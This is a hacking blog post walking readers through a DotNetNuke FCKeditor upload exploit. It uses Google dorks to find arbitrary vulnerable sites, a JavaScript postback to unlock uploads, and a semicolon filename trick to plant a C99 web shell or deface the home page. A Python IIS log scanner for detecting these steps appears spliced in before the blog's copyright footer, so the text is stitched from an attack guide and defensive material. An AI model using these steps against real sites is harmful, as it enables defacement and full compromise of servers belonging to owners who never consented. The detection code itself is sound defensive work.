DNN hack

DNN [Dot Net Nuke] Exploit


First, check whether the website is vulnerable.
Simply copy one of these queries into Google and hit enter:

:inurl:/tabid/36/language/en-US/Default.aspx


OR

inurl:/Fck/fcklinkgallery.aspx


inurl:/portals/0


Open the home page and check the location of any image. It should be located in /portals/0/

For example, in the case of http://www.example.com, the image is located at http://www.example.c...rtals/0/SHM.jpg

Yeah... it means this website is vulnerable and we can change the front page pic. The current image name is SHM.jpg. Rename the new image you want to upload to SHM.jpg, as proof that you owned the system.

You can also upload shells.


Now here is the exploit

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

HOW TO RUN ?

Simply copy paste it as shown below:



www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You will see the portal where it will ask you to upload. Select the third option, File (A File On Your Site).


After selecting the third option, replace the contents of the URL bar with the script below:

javascript:__doPostBack('ctlURL$cmdUpload','')

After running this JavaScript, you will see the option Upload Selected File. Now select your image file, which you have renamed as SHM.jpg, and upload it here. Go to the main page and refresh... THAT'S IT, you have hacked the website.



1. In our first step we check whether the website is vulnerable by using Google dorks. Search for the following query in Google.

inurl:/portals/0
If you want to check a specific domain, use the query below. Here we can change .com to any desired domain, such as .net, .org, etc.
inurl:/portals/0 site:.com

2. Now choose any website, copy its URL without /portals/0, and paste the code below after it.
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
For example, if the website is http://www.abc.com/portals/0,
remove portals/0 and add the above code. It will become http://www.abc.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
3. If you get this screen, it means the website is vulnerable.

4. Now choose the third option, where we can upload a file.
5. Now replace the contents of the address bar with the code below. This code allows us to upload any file from the local computer.
javascript:__doPostBack('ctlURL$cmdUpload','')






ONE POINT TO BE NOTED: THE SHELL THAT YOU ARE UPLOADING MUST BE IN jpg, png, bmp, blah blah form. For this
you must edit your shell and save it as:

Code:

shell.format;.jpg

For example, I am using the C99 shell and I will save it as:

Code:

c99.asp;.jpg

Usually c99 is a PHP-type shell.
NOW UPLOAD IT

NOW AFTER UPLOADING THE SHELL OPEN YOUR SHELL 
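
For site owners, the steps above leave a recognizable trail in the IIS access log: a request to fcklinkgallery.aspx, a POST back to it, and later requests for a file under /portals/ whose name carries a script extension followed by a semicolon. The scanner below is an added example, not code from the original post or from DNN. It assumes W3C extended logs with a `#Fields:` header, and the extension list, reason labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path of the upload page named in the post (compared case-insensitively).
GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
# Script extension followed by ';' in the file name, e.g. "c99.asp;.jpg".
# The extension list is an assumption; extend it to match your handler mappings.
SEMI_EXT = re.compile(r"\.(asp|aspx|asa|cer|ashx|php);[^/]*$", re.I)

def scan_iis_log(lines):
    """Return (reason, client_ip, method, uri_stem) for each suspicious row."""
    fields, findings = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = unquote(row.get("cs-uri-stem", ""))  # also catches %3b for ';'
        method, ip = row.get("cs-method", "-"), row.get("c-ip", "-")
        low = stem.lower()
        if low.endswith(GALLERY):
            # A POST to the gallery page is the postback/upload step.
            reason = "gallery-post" if method == "POST" else "gallery-access"
            findings.append((reason, ip, method, stem))
        elif "/portals/" in low and SEMI_EXT.search(stem):
            findings.append(("semicolon-extension", ip, method, stem))
    return findings

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 10:00:00 GET /Default.aspx - 198.51.100.7 200
2024-01-01 10:00:05 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 198.51.100.7 200
2024-01-01 10:00:40 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 198.51.100.7 200
2024-01-01 10:01:10 GET /portals/0/c99.asp;.jpg - 198.51.100.7 200
2024-01-01 10:01:30 GET /Portals/0/shell.aspx%3b.png - 203.0.113.5 200
2024-01-01 10:02:00 GET /portals/0/SHM.jpg - 203.0.113.9 200
""".splitlines()

if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any `gallery-post` or `semicolon-extension` hit is worth checking against the files actually present under the portal's upload directory.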
Copyrights: Please stop stealing content from our site, i.e. xedlgubaid.blogspot.com. I am working hard to create an article, and you are simply copying? Please respect our hard work. At least place a backlink to our site and give credit to our blog/author. Hope you will understand our feelings.
